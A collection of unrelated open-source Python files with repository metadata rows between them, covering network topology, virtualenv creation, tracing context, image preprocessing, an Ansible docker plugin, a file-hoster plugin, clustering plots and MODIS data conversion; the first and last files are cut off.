self.addLink(p1c, p2a1, bw=1000, loss=2)
self.addLink(p1c, p3a1, bw=1000, loss=2)
## p2c
self.addLink(p2c, p0a2, bw=1000, loss=2)
self.addLink(p2c, p1a2, bw=1000, loss=2)
self.addLink(p2c, p2a2, bw=1000, loss=2)
self.addLink(p2c, p3a2, bw=1000, loss=2)
## p3c
self.addLink(p3c, p0a2, bw=1000, loss=2)
self.addLink(p3c, p1a2, bw=1000, loss=2)
self.addLink(p3c, p2a2, bw=1000, loss=2)
self.addLink(p3c, p3a2, bw=1000, loss=2)
topos = {'fattree': (lambda: FatTreeTopoHardCode())}
|
mit
| -4,874,537,547,002,850,000
| 30.457746
| 52
| 0.544437
| false
| 2.418517
| false
| false
| false
|
living180/vex
|
vex/make.py
|
1
|
2367
|
import os
import sys
import distutils.spawn
from vex.run import run
from vex import exceptions
PYDOC_SCRIPT = """#!/usr/bin/env python
from pydoc import cli
cli()
""".encode('ascii')
PYDOC_BATCH = """
@python -m pydoc %*
""".encode('ascii')
def handle_make(environ, options, make_path):
if os.path.exists(make_path):
# Can't ignore existing virtualenv happily because existing one
# might have different parameters and --make implies nonexistent
raise exceptions.VirtualenvAlreadyMade(
"virtualenv already exists: {0!r}".format(make_path)
)
ve_base = os.path.dirname(make_path)
if not os.path.exists(ve_base):
os.mkdir(ve_base)
elif not os.path.isdir(ve_base):
raise exceptions.VirtualenvNotMade(
"could not make virtualenv: "
"{0!r} already exists but is not a directory. "
"Choose a different virtualenvs path using ~/.vexrc "
"or $WORKON_HOME, or remove the existing file; "
"then rerun your vex --make command.".format(ve_base)
)
# TODO: virtualenv is usually not on PATH for Windows,
# but finding it is a terrible issue.
if os.name == 'nt' and not os.environ.get('VIRTUAL_ENV', ''):
ve = os.path.join(
os.path.dirname(sys.executable),
'Scripts',
'virtualenv'
)
else:
ve = 'virtualenv'
args = [ve, make_path]
if options.python:
if os.name == 'nt':
python = distutils.spawn.find_executable(options.python)
if python:
options.python = python
args += ['--python', options.python]
if options.site_packages:
args += ['--system-site-packages']
if options.always_copy:
args+= ['--always-copy']
returncode = run(args, env=environ, cwd=ve_base)
if returncode != 0:
raise exceptions.VirtualenvNotMade("error creating virtualenv")
if os.name != 'nt':
pydoc_path = os.path.join(make_path, 'bin', 'pydoc')
with open(pydoc_path, 'wb') as out:
out.write(PYDOC_SCRIPT)
perms = os.stat(pydoc_path).st_mode
os.chmod(pydoc_path, perms | 0o0111)
else:
pydoc_path = os.path.join(make_path, 'Scripts', 'pydoc.bat')
with open(pydoc_path, 'wb') as out:
out.write(PYDOC_BATCH)
|
mit
| -1,349,267,931,707,901,400
| 32.814286
| 72
| 0.600338
| false
| 3.710031
| false
| false
| false
|
census-instrumentation/opencensus-python
|
context/opencensus-context/opencensus/common/runtime_context/__init__.py
|
1
|
5207
|
# Copyright 2019, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import contextvars
except ImportError:
contextvars = None
import threading
__all__ = ['RuntimeContext']
class _RuntimeContext(object):
@classmethod
def clear(cls):
"""Clear all slots to their default value."""
raise NotImplementedError # pragma: NO COVER
@classmethod
def register_slot(cls, name, default=None):
"""Register a context slot with an optional default value.
:type name: str
:param name: The name of the context slot.
:type default: object
:param name: The default value of the slot, can be a value or lambda.
:returns: The registered slot.
"""
raise NotImplementedError # pragma: NO COVER
def apply(self, snapshot):
"""Set the current context from a given snapshot dictionary"""
for name in snapshot:
setattr(self, name, snapshot[name])
def snapshot(self):
"""Return a dictionary of current slots by reference."""
return dict((n, self._slots[n].get()) for n in self._slots.keys())
def __repr__(self):
return ('{}({})'.format(type(self).__name__, self.snapshot()))
def __getattr__(self, name):
if name not in self._slots:
raise AttributeError('{} is not a registered context slot'
.format(name))
slot = self._slots[name]
return slot.get()
def __setattr__(self, name, value):
if name not in self._slots:
raise AttributeError('{} is not a registered context slot'
.format(name))
slot = self._slots[name]
slot.set(value)
def with_current_context(self, func):
"""Capture the current context and apply it to the provided func"""
caller_context = self.snapshot()
def call_with_current_context(*args, **kwargs):
try:
backup_context = self.snapshot()
self.apply(caller_context)
return func(*args, **kwargs)
finally:
self.apply(backup_context)
return call_with_current_context
class _ThreadLocalRuntimeContext(_RuntimeContext):
_lock = threading.Lock()
_slots = {}
class Slot(object):
_thread_local = threading.local()
def __init__(self, name, default):
self.name = name
self.default = default if callable(default) else (lambda: default)
def clear(self):
setattr(self._thread_local, self.name, self.default())
def get(self):
try:
return getattr(self._thread_local, self.name)
except AttributeError:
value = self.default()
self.set(value)
return value
def set(self, value):
setattr(self._thread_local, self.name, value)
@classmethod
def clear(cls):
with cls._lock:
for name in cls._slots:
slot = cls._slots[name]
slot.clear()
@classmethod
def register_slot(cls, name, default=None):
with cls._lock:
if name in cls._slots:
raise ValueError('slot {} already registered'.format(name))
slot = cls.Slot(name, default)
cls._slots[name] = slot
return slot
class _AsyncRuntimeContext(_RuntimeContext):
_lock = threading.Lock()
_slots = {}
class Slot(object):
def __init__(self, name, default):
self.name = name
self.contextvar = contextvars.ContextVar(name)
self.default = default if callable(default) else (lambda: default)
def clear(self):
self.contextvar.set(self.default())
def get(self):
try:
return self.contextvar.get()
except LookupError:
value = self.default()
self.set(value)
return value
def set(self, value):
self.contextvar.set(value)
@classmethod
def clear(cls):
with cls._lock:
for name in cls._slots:
slot = cls._slots[name]
slot.clear()
@classmethod
def register_slot(cls, name, default=None):
with cls._lock:
if name in cls._slots:
raise ValueError('slot {} already registered'.format(name))
slot = cls.Slot(name, default)
cls._slots[name] = slot
return slot
RuntimeContext = _ThreadLocalRuntimeContext()
if contextvars:
RuntimeContext = _AsyncRuntimeContext()
|
apache-2.0
| 6,168,054,212,656,618,000
| 28.418079
| 78
| 0.580757
| false
| 4.484927
| false
| false
| false
|
google-research/tensor2robot
|
preprocessors/distortion.py
|
1
|
4670
|
# coding=utf-8
# Copyright 2021 The Tensor2Robot Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Shared utils for image distorton and cropping."""
from tensor2robot.preprocessors import image_transformations
import tensorflow.compat.v1 as tf
def maybe_distort_image_batch(images, mode):
"""Applies data augmentation to given images.
Args:
images: 4D Tensor (batch images) or 5D Tensor (batch of image sequences).
mode: (ModeKeys) Specifies if this is training, evaluation or prediction.
Returns:
Distorted images. Image distortion is identical for every image in the
batch.
"""
if mode == tf.estimator.ModeKeys.TRAIN:
images = image_transformations.ApplyPhotometricImageDistortions([images])[0]
return images
def preprocess_image(image,
mode,
is_sequence,
input_size,
target_size,
crop_size=None,
image_distortion_fn=maybe_distort_image_batch):
"""Shared preprocessing function for images.
Args:
image: A tf.Tensor for the input images, which is either a 4D Tensor (batch
of images) or 5D Tensor (batch of sequences). It is assumed that all
dimensions are constant, except the batch dimension.
mode: (modekeys) specifies if this is training, evaluation or prediction.
is_sequence: Should be True if input is a batch of sequences, and False
otherwise.
input_size: [h, w] of the input image
target_size: [h, w] of the output image, expected to be equal or smaller
than input size. If smaller, we do a crop of the image.
crop_size: [h, w] of crop size. If None, defaults to target_size.
image_distortion_fn: A function that takes an image tensor and the training
mode as input and returns an image tensor of the same size as the input.
Returns:
A tf.Tensor for the batch of images / batch of sequences. If mode == TRAIN,
this applies image distortion and crops the image randomly. Otherwise, it
does not add image distortion and takes a crop from the center of the image.
"""
leading_shape = tf.shape(image)[:-3]
# Must be tf.float32 to distort.
image = tf.image.convert_image_dtype(image, tf.float32)
if is_sequence:
# Flatten batch dimension.
image = tf.reshape(image, [-1] + image.shape[-3:].as_list())
crop_size = crop_size or target_size
image = crop_image(
image, mode, input_size=input_size, target_size=crop_size)
# Reshape to target size.
image = tf.image.resize_images(image, target_size)
# Convert dtype and distort.
image = image_distortion_fn(image, mode=mode)
# Flatten back into a sequence.
if is_sequence:
tail_shape = tf.constant(list(target_size) + [3])
full_final_shape = tf.concat([leading_shape, tail_shape], axis=0)
image = tf.reshape(image, full_final_shape)
return image
def crop_image(img, mode, input_size=(512, 640), target_size=(472, 472)):
"""Takes a crop of the image, either randomly or from the center.
The crop is consistent across all images given in the batch.
Args:
img: 4D image Tensor [batch, height, width, channels].
mode: (ModeKeys) Specifies if this is training, evaluation or prediction.
input_size: (height, width) of input.
target_size: (height, width) of desired crop.
Returns:
img cropped to the desired size, randomly if mode == TRAIN and from the
center otherwise.
"""
if input_size == target_size:
# Don't even bother adding the ops.
return img
input_height, input_width = input_size
input_shape = (input_height, input_width, 3)
target_shape = target_size
if mode == tf.estimator.ModeKeys.TRAIN:
crops = image_transformations.RandomCropImages([img],
input_shape=input_shape,
target_shape=target_shape)[0]
else:
crops = image_transformations.CenterCropImages([img],
input_shape=input_shape,
target_shape=target_shape)[0]
return crops
|
apache-2.0
| 1,685,826,182,705,913,300
| 36.96748
| 80
| 0.66788
| false
| 3.988044
| false
| false
| false
|
huangminghuang/ansible-docker-connection
|
connection_plugins/docker.py
|
1
|
3787
|
# Connection plugin for configuring docker containers
# Author: Lorin Hochstein
#
# Based on the chroot connection plugin by Maykel Moya
import os
import subprocess
import time
from ansible import errors
from ansible.callbacks import vvv
class Connection(object):
def __init__(self, runner, host, port, *args, **kwargs):
self.host = host
self.runner = runner
self.has_pipelining = False
self.docker_cmd = "docker"
def connect(self, port=None):
""" Connect to the container. Nothing to do """
return self
def exec_command(self, cmd, tmp_path, sudo_user=None, sudoable=False,
executable='/bin/sh', in_data=None, become=None,
become_user=None):
""" Run a command on the local host """
# Don't currently support su
# if su or su_user:
# raise errors.AnsibleError("Internal Error: this module does not "
# "support running commands via su")
if in_data:
raise errors.AnsibleError("Internal Error: this module does not "
"support optimized module pipelining")
# if sudoable and sudo_user:
# raise errors.AnsibleError("Internal Error: this module does not "
# "support running commands via sudo")
if executable:
local_cmd = [self.docker_cmd, "exec", self.host, executable,
'-c', cmd]
else:
local_cmd = '%s exec "%s" %s' % (self.docker_cmd, self.host, cmd)
vvv("EXEC %s" % (local_cmd), host=self.host)
p = subprocess.Popen(local_cmd,
shell=isinstance(local_cmd, basestring),
cwd=self.runner.basedir,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
return (p.returncode, '', stdout, stderr)
# Docker doesn't have native support for copying files into running
# containers, so we use docker exec to implement this
def put_file(self, in_path, out_path):
""" Transfer a file from local to container """
args = [self.docker_cmd, "exec", "-i", self.host, "bash", "-c",
"cat > %s" % format(out_path)]
vvv("PUT %s TO %s" % (in_path, out_path), host=self.host)
if not os.path.exists(in_path):
raise errors.AnsibleFileNotFound(
"file or module does not exist: %s" % in_path)
p = subprocess.Popen(args, stdin=open(in_path),
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.communicate()
# HACK: Due to a race condition, this sometimes returns before
# the file has been written to disk, so we sleep for one second
time.sleep(1)
def fetch_file(self, in_path, out_path):
""" Fetch a file from container to local. """
# out_path is the final file path, but docker takes a directory, not a
# file path
out_dir = os.path.dirname(out_path)
args = [self.docker_cmd, "cp", "%s:%s" % (self.host, in_path), out_dir]
vvv("FETCH %s TO %s" % (in_path, out_path), host=self.host)
p = subprocess.Popen(args, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.communicate()
# Rename if needed
actual_out_path = os.path.join(out_dir, os.path.basename(in_path))
if actual_out_path != out_path:
os.rename(actual_out_path, out_path)
def close(self):
""" Terminate the connection. Nothing to do for Docker"""
pass
|
gpl-3.0
| 7,907,822,090,526,358,000
| 37.642857
| 79
| 0.567468
| false
| 4.098485
| false
| false
| false
|
JeroenBosmans/nabu
|
nabu/processing/text_reader.py
|
1
|
3606
|
'''@file textreader.py
contains the Textreader class'''
import os
import numpy as np
class TextReader(object):
'''reads text from disk'''
def __init__(self, textfile, max_length, coder, base_pos=0,
end_pos=None):
'''TextReader constructor
Args:
textfile: the path to the file containing the text
max_length: the maximal length of a line
coder: a TargetCoder object
base_pos: the base postion where to start reading in the file
end_pos: optional maximal position in the file'''
self.max_length = max_length
self.coder = coder
#initialise the position to the beginning of the file
self.base_pos = base_pos
self.pos = base_pos
self.end_pos = end_pos or os.path.getsize(textfile)
if base_pos >= self.end_pos:
raise Exception('base position should come before end position')
#store the scp path
self.textfile = textfile
def get_utt(self):
'''read the next line of data specified in the scp file
Args:
pos: the desired position in the scp file in bytes
Returns:
- the line identifier
- the read line as a [length x 1] numpy array
- whether or not the read utterance is the last one
'''
#read a line
line_id, line, looped = self.read_line()
#encode the line
encoded = self.coder.encode(line)[:, np.newaxis]
return line_id, encoded, looped
def read_line(self):
'''read the next line of data specified in the scp file
Args:
pos: the desired position in the scp file in bytes
Returns:
- the line identifier
- the read line as a string
- whether or not the read utterance is the last one
'''
#create the utteance id
line_id = 'line%d' % self.pos
#read a line in the scp file
with open(self.textfile) as fid:
fid.seek(self.pos)
line = fid.readline().strip()
self.pos = fid.tell()
#if end of file is reached loop around
if self.pos >= self.end_pos:
looped = True
self.pos = self.base_pos
else:
looped = False
return line_id, line, looped
def split(self, numlines):
'''split of a part of the textreader
Args:
numlines: number of lines tha should be in the new textreader
Returns:
a Textreader object that contains the required number of lines
'''
#read the requested number of lines
self.pos = self.base_pos
for _ in range(numlines):
_, _, looped = self.get_utt()
if looped:
raise Exception('number of requested lines exeeds the content')
#create a new textreader with the appropriate boundaries
textreader = TextReader(self.textfile, self.max_length, self.base_pos,
self.pos)
#update the base position
self.base_pos = self.pos
return textreader
def as_dict(self):
'''return the reader as a dictionary'''
#save the position
pos = self.pos
#start at the beginning
self.pos = self.base_pos
asdict = dict()
looped = False
while not looped:
line_id, line, looped = self.read_line()
asdict[line_id] = line
#set the position back to the original
self.pos = pos
|
mit
| -8,119,472,119,550,117,000
| 27.619048
| 79
| 0.567388
| false
| 4.222482
| false
| false
| false
|
zenieldanaku/pygpj
|
main.py
|
1
|
1847
|
import func.core.config as c
import func.core.intro as intro
from func.core.lang import t
from func.core.viz import subselector
from func.core.prsnj import Pj
from func.core.export import imprimir_clases
import os
def cargar_archivo(prompt, carpeta):
from func.data.setup import data as s
ars, nom = [], []
for ar in os.listdir(carpeta):
if os.path.isfile(carpeta+'/'+ar):
personaje = c.abrir_json(carpeta+'/'+ar)
nom.append(personaje['nombre']+' ('+imprimir_clases(personaje['cla'],s.CLASES)+')')
ars.append(ar)
sel = subselector(prompt,nom,True)
data = c.abrir_json(carpeta+'/'+ars[sel])
return data
def menu ():
while True:
opciones = [t('Crear un nuevo personaje'),
t('Avanzar un personaje existente'),
t('Editar preferencias'),
t('Salir'),
'\n'+t('Ver licencia')]
intro.imprimir_titulo()
intro.introduccion()
print(t('Elije una opción'))
op = subselector(t('Opción'),opciones)
if op == 0: # Crear un nuevo Pj
import func.core.chargen
Pj.nuevo_pj()
func.core.chargen.go()
elif op == 1: # Avanzar un Pj existente
import func.core.chargen
Pj.cargar_pj(cargar_archivo('Personaje','Guardar'))
func.core.chargen.go()
elif op == 2: # preferencias
c.preferencias(c.abrir_json('config.json'))
elif op == 3: # exit
break
elif op == 4:
intro.licencia('LICENSE.txt')
input(t('\n[Presione Enter para continuar]\n'))
if __name__ == '__main__':
os.system(['clear','cls'][os.name == 'nt'])
menu()
|
mit
| -6,750,891,117,660,819,000
| 32.166667
| 95
| 0.532249
| false
| 3.300537
| false
| false
| false
|
fzimmermann89/pyload
|
module/plugins/hoster/LoadTo.py
|
1
|
2129
|
# -*- coding: utf-8 -*-
#
# Test links:
# http://www.load.to/JWydcofUY6/random.bin
# http://www.load.to/oeSmrfkXE/random100.bin
import re
from module.plugins.captcha.SolveMedia import SolveMedia
from module.plugins.internal.SimpleHoster import SimpleHoster, create_getInfo
class LoadTo(SimpleHoster):
__name__ = "LoadTo"
__type__ = "hoster"
__version__ = "0.26"
__status__ = "testing"
__pattern__ = r'http://(?:www\.)?load\.to/\w+'
__config__ = [("activated" , "bool", "Activated" , True),
("use_premium", "bool", "Use premium account if available", True)]
__description__ = """Load.to hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("halfman", "Pulpan3@gmail.com"),
("stickell", "l.stickell@yahoo.it")]
NAME_PATTERN = r'<h1>(?P<N>.+?)</h1>'
SIZE_PATTERN = r'Size: (?P<S>[\d.,]+) (?P<U>[\w^_]+)'
OFFLINE_PATTERN = r'>Can\'t find file'
LINK_FREE_PATTERN = r'<form method="post" action="(.+?)"'
WAIT_PATTERN = r'type="submit" value="Download \((\d+)\)"'
URL_REPLACEMENTS = [(r'(\w)$', r'\1/')]
def setup(self):
self.multiDL = True
self.chunk_limit = 1
def handle_free(self, pyfile):
#: Search for Download URL
m = re.search(self.LINK_FREE_PATTERN, self.html)
if m is None:
self.error(_("LINK_FREE_PATTERN not found"))
self.link = m.group(1)
#: Set Timer - may be obsolete
m = re.search(self.WAIT_PATTERN, self.html)
if m is not None:
self.wait(m.group(1))
#: Load.to is using solvemedia captchas since ~july 2014:
solvemedia = SolveMedia(self)
captcha_key = solvemedia.detect_key()
if captcha_key:
response, challenge = solvemedia.challenge(captcha_key)
self.download(self.link,
post={'adcopy_challenge': challenge,
'adcopy_response' : response,
'returnUrl' : pyfile.url})
getInfo = create_getInfo(LoadTo)
|
gpl-3.0
| 2,512,844,144,708,544,500
| 29.855072
| 85
| 0.542508
| false
| 3.379365
| false
| false
| false
|
SUNET/eduid-webapp
|
src/eduid_webapp/idp/tou_action.py
|
1
|
2992
|
#
# Copyright (c) 2015 NORDUnet A/S
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# 3. Neither the name of the NORDUnet nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
__author__ = 'eperez'
from typing import Optional
from eduid_common.session.logindata import SSOLoginData
from eduid_userdb.actions import Action
from eduid_userdb.idp import IdPUser
from eduid_webapp.idp.app import current_idp_app as current_app
def add_actions(user: IdPUser, ticket: SSOLoginData) -> Optional[Action]:
"""
Add an action requiring the user to accept a new version of the Terms of Use,
in case the IdP configuration points to a version the user hasn't accepted.
This function is called by the IdP when it iterates over all the registered
action plugins entry points.
:param user: the authenticating user
:param ticket: the SSO login data
"""
version = current_app.conf.tou_version
interval = current_app.conf.tou_reaccept_interval
if user.tou.has_accepted(version, interval):
current_app.logger.debug(f'User has already accepted ToU version {version!r}')
return None
if not current_app.actions_db:
current_app.logger.warning('No actions_db - aborting ToU action')
return None
if current_app.actions_db.has_actions(user.eppn, action_type='tou', params={'version': version}):
return None
current_app.logger.debug(f'User must accept ToU version {version!r}')
return current_app.actions_db.add_action(user.eppn, action_type='tou', preference=100, params={'version': version})
|
bsd-3-clause
| 7,871,357,113,988,800,000
| 41.742857
| 119
| 0.739973
| false
| 4.087432
| false
| false
| false
|
robin-lai/DensityPeakCluster
|
plot.py
|
1
|
1965
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import logging
import numpy as np
from cluster import *
from sklearn import manifold
from plot_utils import *
def plot_rho_delta(rho, delta):
'''
Plot scatter diagram for rho-delta points
Args:
rho : rho list
delta : delta list
'''
logger.info("PLOT: rho-delta plot")
plot_scatter_diagram(0, rho[1:], delta[1:], x_label='rho', y_label='delta', title='rho-delta')
def plot_cluster(cluster):
'''
Plot scatter diagram for final points that using multi-dimensional scaling for data
Args:
cluster : DensityPeakCluster object
'''
logger.info("PLOT: cluster result, start multi-dimensional scaling")
dp = np.zeros((cluster.max_id, cluster.max_id), dtype = np.float32)
cls = []
for i in xrange(1, cluster.max_id):
for j in xrange(i + 1, cluster.max_id + 1):
dp[i - 1, j - 1] = cluster.distances[(i, j)]
dp[j - 1, i - 1] = cluster.distances[(i, j)]
cls.append(cluster.cluster[i])
cls.append(cluster.cluster[cluster.max_id])
cls = np.array(cls, dtype = np.float32)
fo = open(r'./tmp.txt', 'w')
fo.write('\n'.join(map(str, cls)))
fo.close()
seed = np.random.RandomState(seed=3)
mds = manifold.MDS(max_iter=200, eps=1e-4, n_init=1)
dp_mds = mds.fit_transform(dp)
logger.info("PLOT: end mds, start plot")
plot_scatter_diagram(1, dp_mds[:, 0], dp_mds[:, 1], title='cluster', style_list = cls)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
dpcluster = DensityPeakCluster()
# dpcluster.local_density(load_paperdata, './example_distances.dat')
# plot_rho_delta(rho, delta) #plot to choose the threthold
rho, delta, nneigh = dpcluster.cluster(load_paperdata, './data/data_in_paper/example_distances.dat', 20, 0.1)
logger.info(str(len(dpcluster.ccenter)) + ' center as below')
for idx, center in dpcluster.ccenter.items():
logger.info('%d %f %f' %(idx, rho[center], delta[center]))
plot_cluster(dpcluster)
|
mit
| -2,970,879,158,770,166,000
| 34.107143
| 110
| 0.679389
| false
| 2.779349
| false
| false
| false
|
samantp/gensimPy3
|
gensim/models/lsi_worker.py
|
1
|
3221
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010 Radim Rehurek <radimrehurek@seznam.cz>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
USAGE: %(program)s
Worker ("slave") process used in computing distributed LSI. Run this script \
on every node in your cluster. If you wish, you may even run it multiple times \
on a single machine, to make better use of multiple cores (just beware that \
memory footprint increases accordingly).
Example: python -m gensim.models.lsi_worker
"""
import os, sys, logging
import threading
import tempfile
from gensim.models import lsimodel
from gensim import utils
logger = logging.getLogger('gensim.models.lsi_worker')
SAVE_DEBUG = 0 # save intermediate models after every SAVE_DEBUG updates (0 for never)
class Worker(object):
def __init__(self):
self.model = None
def initialize(self, myid, dispatcher, **model_params):
self.lock_update = threading.Lock()
self.jobsdone = 0 # how many jobs has this worker completed?
self.myid = myid # id of this worker in the dispatcher; just a convenience var for easy access/logging TODO remove?
self.dispatcher = dispatcher
logger.info("initializing worker #%s" % myid)
self.model = lsimodel.LsiModel(**model_params)
def requestjob(self):
"""
Request jobs from the dispatcher in an infinite loop. The requests are
blocking, so if there are no jobs available, the thread will wait.
"""
if self.model is None:
raise RuntimeError("worker must be initialized before receiving jobs")
job = self.dispatcher.getjob(self.myid) # blocks until a new job is available from the dispatcher
logger.info("worker #%s received job #%i" % (self.myid, self.jobsdone))
self.processjob(job)
self.dispatcher.jobdone(self.myid)
@utils.synchronous('lock_update')
def processjob(self, job):
self.model.add_documents(job)
self.jobsdone += 1
if SAVE_DEBUG and self.jobsdone % SAVE_DEBUG == 0:
fname = os.path.join(tempfile.gettempdir(), 'lsi_worker.pkl')
self.model.save(fname)
@utils.synchronous('lock_update')
def getstate(self):
logger.info("worker #%i returning its state after %s jobs" %
(self.myid, self.jobsdone))
assert isinstance(self.model.projection, lsimodel.Projection)
result = self.model.projection
self.model.projection = self.model.projection.empty_like()
return result
def exit(self):
logger.info("terminating worker #%i" % self.myid)
os._exit(0)
#endclass Worker
def main():
logging.basicConfig(format = '%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
logger.info("running %s" % " ".join(sys.argv))
program = os.path.basename(sys.argv[0])
# make sure we have enough cmd line parameters
if len(sys.argv) < 1:
print(globals()["__doc__"] % locals())
sys.exit(1)
utils.pyro_daemon('gensim.lsi_worker', Worker(), random_suffix=True)
logger.info("finished running %s" % program)
if __name__ == '__main__':
main()
|
gpl-3.0
| -6,709,509,564,474,837,000
| 29.971154
| 123
| 0.656007
| false
| 3.710829
| false
| false
| false
|
gilliM/MFQ
|
ModisFromQgis/mypymodis/convertmodis.py
|
1
|
9852
|
#!/usr/bin/env python
# class to convert/process modis data
#
# (c) Copyright Luca Delucchi 2010
# Authors: Luca Delucchi
# Email: luca dot delucchi at iasma dot it
#
##################################################################
#
# This MODIS Python class is licensed under the terms of GNU GPL 2.
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
##################################################################
"""Convert MODIS HDF file to GeoTiff file or create a HDF mosaic file for
several tiles using Modis Reprojection Tools.
Classes:
* :class:`convertModis`
* :class:`createMosaic`
* :class:`processModis`
Functions:
* :func:`checkMRTpath`
"""
# to be compliant with python 3
from __future__ import print_function
import os
import sys
def checkMRTpath(mrtpath):
"""Function to check if MRT path it correct
:param str mrtpath: the path to MRT directory
:return: The path to 'bin' and 'data' directory inside MRT path
"""
if os.path.exists(mrtpath):
if os.path.exists(os.path.join(mrtpath, 'bin')):
mrtpathbin = os.path.join(mrtpath, 'bin')
os.environ['PATH'] = "{path}:{data}".format(path=os.environ['PATH'],
data=os.path.join(mrtpath, 'data'))
else:
raise IOError('The path {path} does not exist'.format(path=os.path.join(mrtpath, 'bin')))
if os.path.exists(os.path.join(mrtpath, 'data')):
mrtpathdata = os.path.join(mrtpath, 'data')
os.environ['MRTDATADIR'] = os.path.join(mrtpath, 'data')
else:
raise IOError('The path {path} does not exist'.format(path=os.path.join(mrtpath, 'data')))
else:
raise IOError('The path {name} does not exist'.format(name=mrtpath))
return mrtpathbin, mrtpathdata
class convertModis:
"""A class to convert modis data from hdf to tif using resample
(from MRT tools)
:param str hdfname: the full path to the hdf file
:param str confile: the full path to the paramater file
:param str mrtpath: the full path to mrt directory which contains
the bin and data directories
"""
def __init__(self, hdfname, confile, mrtpath):
"""Initialization function"""
# check if the hdf file exists
if os.path.exists(hdfname):
self.name = hdfname
else:
raise IOError('{name} does not exist'.format(name=hdfname))
# check if confile exists
if os.path.exists(confile):
self.conf = confile
else:
raise IOError('{name} does not exist'.format(name=confile))
# check if mrtpath and subdirectories exists and set environment
# variables
self.mrtpathbin, self.mrtpathdata = checkMRTpath(mrtpath)
def executable(self):
"""Return the executable of resample MRT software"""
if sys.platform.count('linux') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'resample')):
return os.path.join(self.mrtpathbin, 'resample')
elif sys.platform.count('win32') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'resample.exe')):
return os.path.join(self.mrtpathbin, 'resample.exe')
def run(self):
"""Exec the convertion process"""
import subprocess
execut = self.executable()
if not os.path.exists(execut):
raise IOError('The path {name} does not exist: it could be an '
'erroneus path or software'.format(name=execut))
else:
subprocess.call([execut, '-p', self.conf])
return "The hdf file {name} was converted successfully".format(name=self.name)
class createMosaic:
"""A class to convert several MODIS tiles into a mosaic
:param str listfile: the path to file with the list of HDF MODIS
file
:param str outprefix: the prefix for output files
:param str mrtpath: the full path to mrt directory which contains
the bin and data directories
:param str subset: a string composed by 1 and 0 according with the
layer to mosaic. The string should something like
'1 0 1 0 0 0 0'
"""
def __init__(self, listfile, outprefix, mrtpath, subset=False):
"""Function to initialize the object"""
import tempfile
# check if the hdf file exists
if os.path.exists(listfile):
self.basepath = os.path.split(listfile)[0]
self.fullpath = os.path.realpath(self.basepath)
self.listfiles = listfile
self.tmplistfiles = open(os.path.join(tempfile.gettempdir(),
'{name}.prm'.format(name=str(os.getpid()))), 'w')
self.HDFfiles = open(listfile).readlines()
else:
raise IOError('{name} not exists'.format(name=listfile))
# check if mrtpath and subdirectories exists and set environment
# variables
self.mrtpathbin, self.mrtpathdata = checkMRTpath(mrtpath)
self.out = os.path.join(self.basepath, outprefix + '.hdf')
self.outxml = self.out + '.xml'
self.subset = subset
def write_mosaic_xml(self):
"""Write the XML metadata file for MODIS mosaic"""
from parsemodis import parseModisMulti
listHDF = []
for i in self.HDFfiles:
if i.find(self.basepath) == -1 and i.find('.hdf.xml') == -1:
print("Attention: maybe you do not have the full path in the"
" HDF file list")
listHDF.append(os.path.join(self.basepath, i.strip()))
self.tmplistfiles.write("{name}\n".format(name=os.path.join(self.basepath, i.strip())))
elif i.find('.hdf.xml') == -1:
